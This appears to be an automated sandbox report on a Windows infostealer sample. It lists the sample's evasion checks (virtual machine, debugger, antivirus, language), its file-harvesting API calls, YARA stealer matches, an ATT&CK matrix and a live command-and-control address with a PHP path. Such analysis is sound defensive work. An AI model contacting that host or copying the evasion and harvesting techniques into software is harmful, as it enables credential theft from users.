                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-28922
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeEvaded block: after key decisiongraph_0-30080
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeAPI coverage: 7.0 %
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022F3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_022F3B17
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022F4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022F4B77
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022EE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022EE077
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022EC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_022EC0D7
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022E1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022E1937
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022F4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_022F4107
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022EF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022EF917
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022EE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_022EE697
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022EEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_022EEF87
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022F47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_022F47D7
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022EDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_022EDCE7
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                      Source: Amcache.hve.3.drBinary or memory string: VMware
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: hi2jR57Z15.exe, 00000000.00000002.1924904290.00000000008AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: hi2jR57Z15.exe, 00000000.00000002.1924904290.000000000084E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareCA
                      Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: hi2jR57Z15.exe, 00000000.00000002.1924904290.0000000000893000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$
                      Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: hi2jR57Z15.exe, 00000000.00000002.1924904290.0000000000881000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPf
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: hi2jR57Z15.exe, 00000000.00000002.1924904290.000000000084E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeAPI call chain: ExitProcess graph end nodegraph_0-28749
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeAPI call chain: ExitProcess graph end nodegraph_0-28907
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeAPI call chain: ExitProcess graph end nodegraph_0-28921
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeAPI call chain: ExitProcess graph end nodegraph_0-28910
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeAPI call chain: ExitProcess graph end nodegraph_0-28795
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeAPI call chain: ExitProcess graph end nodegraph_0-28927
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeAPI call chain: ExitProcess graph end nodegraph_0-30335
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeAPI call chain: ExitProcess graph end nodegraph_0-28950
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00801206 push dword ptr fs:[00000030h]0_2_00801206
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022E092B mov eax, dword ptr fs:[00000030h]0_2_022E092B
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022F99B7 mov eax, dword ptr fs:[00000030h]0_2_022F99B7
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022E0D90 mov eax, dword ptr fs:[00000030h]0_2_022E0D90
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022FD151 SetUnhandledExceptionFilter,0_2_022FD151
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022FAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_022FAFAF
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022FB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_022FB5A1
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: hi2jR57Z15.exe PID: 7276, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022F9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_022F9867
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_022F7DF7
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                      Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.3.hi2jR57Z15.exe.2330000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hi2jR57Z15.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hi2jR57Z15.exe.22e0e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hi2jR57Z15.exe.22e0e67.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hi2jR57Z15.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.hi2jR57Z15.exe.2330000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1924904290.000000000084E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1692629472.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: hi2jR57Z15.exe PID: 7276, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.3.hi2jR57Z15.exe.2330000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hi2jR57Z15.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hi2jR57Z15.exe.22e0e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hi2jR57Z15.exe.22e0e67.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hi2jR57Z15.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.hi2jR57Z15.exe.2330000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1924904290.000000000084E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1692629472.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: hi2jR57Z15.exe PID: 7276, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Native API
                      1
                      DLL Side-Loading
                      11
                      Process Injection
                      1
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      2
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Virtualization/Sandbox Evasion
                      LSASS Memory31
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable Media2
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                      Disable or Modify Tools
                      Security Account Manager1
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection
                      NTDS11
                      Process Discovery
                      Distributed Component Object ModelInput Capture12
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      Account Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information
                      Cached Domain Credentials1
                      System Owner/User Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                      Software Packing
                      DCSync1
                      File and Directory Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc Filesystem123
                      System Information Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      hi2jR57Z15.exe39%ReversingLabsWin32.Dropper.Generic
                      hi2jR57Z15.exe100%AviraHEUR/AGEN.1306978
                      hi2jR57Z15.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://upx.sf.net0%URL Reputationsafe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      http://109.107.157.208/49aaa1bd4c594849.phptrue
                        unknown
                        http://109.107.157.208/true
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://109.107.157.208/49aaa1bd4c594849.php)whi2jR57Z15.exe, 00000000.00000002.1924904290.0000000000893000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://109.107.157.208/49aaa1bd4c594849.php/hi2jR57Z15.exe, 00000000.00000002.1924904290.0000000000893000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://109.107.157.208/Ghi2jR57Z15.exe, 00000000.00000002.1924904290.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://upx.sf.netAmcache.hve.3.drfalse
                                • URL Reputation: safe
                                unknown
                                http://109.107.157.208/49aaa1bd4c594849.phpYpJhi2jR57Z15.exe, 00000000.00000002.1924904290.0000000000893000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://109.107.157.208hi2jR57Z15.exe, 00000000.00000002.1924904290.000000000084E000.00000004.00000020.00020000.00000000.sdmptrue
                                    unknown
                                    http://109.107.157.208Chi2jR57Z15.exe, 00000000.00000002.1924904290.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      109.107.157.208
                                      unknownunknown
                                      29314VECTRANET-ASAlZwyciestwa25381-525GdyniaPolandPLtrue
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1541466
                                      Start date and time:2024-10-24 21:31:04 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 4m 32s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:8
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:hi2jR57Z15.exe
